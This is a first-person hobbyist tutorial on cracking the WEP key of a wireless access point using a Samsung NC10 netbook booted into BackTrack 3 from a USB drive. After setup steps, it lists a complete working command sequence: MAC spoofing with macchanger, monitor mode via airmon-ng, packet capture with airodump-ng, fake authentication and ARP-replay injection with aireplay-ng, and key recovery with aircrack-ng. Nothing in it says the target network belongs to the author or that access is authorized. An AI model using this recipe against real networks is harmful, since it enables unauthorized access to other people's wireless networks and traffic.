I wanted to see if it was possible to crack a wep encrypted Access Point using my Samsung Nc10, I was very doubtful wherever this would work or not, But to my surprise It worked like a treat! My Samsung nc10 has a atheros AR5007EG chipset for the inbuilt wireless. I found in the past that backtrack loves atheros based chipsets.
It is important to know if your wireless card can be used in monitor mode, also wherever your wireless adapter supports packet injection.
The first thing I did was head over to www.remote-exploit.org/backtrack.html
I then downloaded the backtrack 3 USB Version of which is 784MB in size. When the file is downloaded you will notice that the file is an ISO image. Obviously my Samsung NC10 is a netbook that doesn't have a cdrom drive so I need to copy that exact image to a usb pen drive.
Head over to http://unetbootin.sourceforge.net and download that file its not too big! - Once you have Unetbootin on you computer you can then run the program and select the location of your iso image you downloaded from backtrack website.
You then want to select the drive letter of your usb drive. Burn the image to the pen drive and within a few minutes you will have a backtrack 3 ready bootable usb drive. Fire up your samsung nc10 and press F2 quickly to enter the bios screen, You want to change the boot priority order to make sure your netbook boots from the usb drive. Once this is done plug in your usb drive and reboot your computer, you should see a menu screen appear with loads of different options. I found with the nc10 selcting the kde with vesa was the option that worked well for me, and within a few minutes you will hear the startup sounds and the desktop will appear.
Now you have backtrack all fired up you will need to open a terminal window, you can see the terminal window by click on the black icon on the taskbar area.
now here are the terminal commands I used to succeed in finding the wep key of my desired access point.
modprobe ath_pci
modprobe ipwraw
iwconfig (gets list of interfaces/network cards on laptop)
airmon-ng stop ath0
ifconfig wifi0 down
macchanger –mac 00:11:22:33:44:66 wifi0
airmon-ng start wifi0
airodump-ng ath0 (gives available routers)
cd /mnt/hda2/ (can do this to change the place to save the captured data)
airodump-ng -c 6 -w network.out –bssid 00:21:21:21:21:21 ath0
aireplay-ng -1 0 -a 00:21:21:21:21:21 -h 00:11:22:33:44:66 -e ssidnamehere ath0
you should get:
15:56:18 Association successful :-) (AID: 1)
aireplay-ng -3 -b 00:21:21:21:21:21 -h 00:11:22:33:44:66 ath0
aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b 00:21:21:21:21:21 -h 00:11:22:33:44:66 ath0
cd /mnt/hda2 (Used this to re-locate to the directory where the captured data is)
aircrack-ng -n 128 -b 00:21:21:21:21:21 network.out-01.cap
This guide is not meant to be an expert tutorial but I thought it might help some people who are interested in wep cracking.
